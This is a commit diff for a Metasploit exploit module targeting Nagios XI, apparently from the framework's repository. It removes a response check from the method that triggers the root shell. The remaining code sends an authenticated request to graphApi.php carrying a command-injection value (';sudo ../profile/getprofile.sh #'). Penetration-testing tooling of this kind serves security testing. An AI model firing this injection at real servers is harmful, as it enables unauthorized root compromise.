Fire and forget the shell

wvu · wvu · commit 68bd4e23756e · 2016-06-29T14:51:05.000-05:00
Edge case where reverse_perl returns 302 when app is unconfigured.
diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -212,7 +212,7 @@ def payload_zip
   end
 
   def pop_dat_shell
-    res = send_request_cgi(
+    send_request_cgi(
       'method'   => 'GET',
       'uri'      => '/nagiosxi/includes/components/perfdata/graphApi.php',
       'cookie'   => @admin_cookie,
@@ -221,10 +221,6 @@ def pop_dat_shell
         'end'    => ';sudo ../profile/getprofile.sh #'
       }
     )
-
-    if res && res.code != 200
-      fail_with(Failure::PayloadFailed, 'Failed to execute root shell! punt!')
-    end
   end
 
   #

Original file line number	Diff line number	Diff line change
`@@ -212,7 +212,7 @@ def payload_zip`
`212`	`212`	`end`
`213`	`213`
`214`	`214`	`def pop_dat_shell`
`215`		`- res = send_request_cgi(`
	`215`	`+ send_request_cgi(`
`216`	`216`	`'method' => 'GET',`
`217`	`217`	`'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',`
`218`	`218`	`'cookie' => @admin_cookie,`
`@@ -221,10 +221,6 @@ def pop_dat_shell`
`221`	`221`	`'end' => ';sudo ../profile/getprofile.sh #'`
`222`	`222`	`}`
`223`	`223`	`)`
`224`		`-`
`225`		`- if res && res.code != 200`
`226`		`- fail_with(Failure::PayloadFailed, 'Failed to execute root shell! punt!')`
`227`		`- end`
`228`	`224`	`end`
`229`	`225`
`230`	`226`	`#`